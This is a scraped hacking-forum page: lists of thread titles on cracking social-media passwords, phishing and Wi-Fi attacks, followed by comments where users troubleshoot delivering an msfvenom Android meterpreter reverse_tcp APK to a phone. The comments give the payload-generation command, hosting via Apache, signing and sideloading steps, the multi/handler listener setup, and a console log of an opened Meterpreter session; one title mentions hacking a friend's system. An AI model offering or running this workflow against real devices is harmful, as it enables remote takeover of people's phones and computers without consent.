- Hot
- Active
-
Forum Thread: How to Install Kali Linux on Iphone or Ipad 26 Replies
1 day ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 45 Replies
2 days ago -
Forum Thread: How to Use NGROK in a Reverse_Tcp Attack? 21 Replies
2 days ago -
Forum Thread: Hack Instagram Account Using BruteForce 191 Replies
3 days ago -
How to: Crack Instagram Passwords Using Instainsane 33 Replies
3 days ago -
Forum Thread: Track phone using imei number. 5 Replies
3 days ago -
Forum Thread: Security in IOT ( Internet of Things ) By [Mohamed Ahmed] 1 Replies
5 days ago -
Forum Thread: Kali linux command error. Kindly help 2 Replies
6 days ago -
Forum Thread: When to Use Reverse Shell and Bind Shell? 5 Replies
1 wk ago -
Forum Thread: Fluxion Not Working 6 Replies
1 wk ago -
Forum Thread: Hacking Stream (LIVE) 10 Replies
1 wk ago -
Forum Thread: Blind SQL Injection 6 Replies
1 wk ago -
Forum Thread: Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce 160 Replies
2 wks ago -
Forum Thread: Can C Programming Help Me for Hacking or Pen Testing. 10 Replies
2 wks ago -
Forum Thread: I Want to Hack in to My Friends System Through his wifi router i am controlling 7 Replies
2 wks ago -
Forum Thread: How to Use the Exploits Found in Vega Scan 3 Replies
2 wks ago -
Forum Thread: Can I Send a File to a Computer Using Ip Address 5 Replies
3 wks ago -
Forum Thread: Problem with Hacking Webserver with Armitage 11 Replies
3 wks ago -
Forum Thread: Metasploit - Embedding an Android Payload into a PDF? 7 Replies
3 wks ago -
Forum Thread: Creating an Completely Undetectable Executable in Under 15 Minutes! 35 Replies
3 wks ago
-
How To: Generate Crackable Wi-Fi Handshakes with an ESP8266-Based Test Network
-
How To: Hack Android Using Kali (Remotely)
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Hunt Down Social Media Accounts by Usernames with Sherlock
-
How To: Rank Up in Google Searches with This SEO Couse Bundle
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How To: Crack SSH Private Key Passwords with John the Ripper
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To: Phish for Social Media & Other Account Passwords with BlackEye
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: 4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
Hack Like a Pro: How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
-
How To: Hack Apache Tomcat via Malicious WAR File Upload
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Write Your Own Bash Scripts to Automate Tasks on Linux
-
How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
14 Responses
Emailing it to yourself and downloading it on your mobile then using a file explorer like Astro should work.
The easiest way is to just connect your phone to you PC via USB and drag it over though.
What if I'm usin a vbox...
And .apk detected virus so can't forward it to ur mail
What to do now?
Just put it on google drive and download it on ur second device from it
it is simple my frend ...all you need is to enable the apache2 service on your attacking machine by typeint the following command
service apache2 start
then move the apk to the following path /var/www/html ..let us assume that the ap is in the desktop so u have to type the following
mv /root/desktop/sfsdfs.apk /var/www/html
then go to your phone and type this
your local ip address/sfsdf.apk ..and it will be downloaded
hope that aswers your question
Missing destination file operand after /root/.............../html
Help me pls!!!!
then go to your phone and type this
your local ip address/sfsdf.apk
in this thing iam getting error, site is not opening and saying site is not rechable
bash: service: command not found
use sudo before the command
use sudo service apache2 start
youv'e probably figured it out by now but. I thought Id expand a bit on the previous answers.
you need to make sure you have "unknown sources" set to allow. You should be able to find it in your phones security settings most likely.
Also you will probably have to sign the apk to avoid the "parsing" error. You should be able to open a kali terminal and use the command "d2j-apk-sign nameof.apk". Alternatively you can use an app called "zipsigner"(among others) from google play and do it after you dl it to your phone.
Lastly as Luke mentioned, just use a file manager to find and select the apk.
Hi guys who could help me to solve a problem related to the download on my android device of the apk file created with msfvenom ??? I'll explain better, in a few words I created the apk file with msfvenom in the following way: msfvenom -p android / meterpreter / reverse_tcp LHOST = myIP LPORT = 4444 R> /var/www/html/linux.apk after I file it created I start the apache2 server with the command sudo service apache2 start. after that I start the msfconsole and start setting the exploit / multi / handler. set LHOST and LPORT then exploits and everything is listening, but when I go to my android device and try to enter the IP address in the URL search bar nothing happens ... I also tried to enter IP followed by the port for example : myIP: 4444 but nothing, then also in this way: myIP: 4444 / linux.apk and not even so .... I tried in different ways but they all give this result! please help! ????????????
after setting "use exploit/multi/handler" . you have to use command "set payload android/meterpreter/reverse_tcp" then set lhost (local ip (if your android and hacking machine is in same network) or public ip (if you are using it over another it )).. :) if you get stuck. reply with ifinity > and your dought.
thanks.....
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.xx.xxx
lhost => 192.168.xx.xxx
msf5 exploit(multi/handler) > exploit
* Started reverse TCP handler on 192.168.xx.xxx:4444
* Sending stage (201283 bytes) to 192.168.xx.xx
* Meterpreter session 1 opened (192.168.xx.xxx:4444 -> 192.168.xx.xx:49567) at 2020-08-23 08:30:25 -0700
Please help!!!!!!!
I created an apk but after i installed it in my phone to get into my phone, the app shows me that it's been made for an older version and reverse tcp handler gets stuck....
How do i get out of this trouble please help ????..
Share Your Thoughts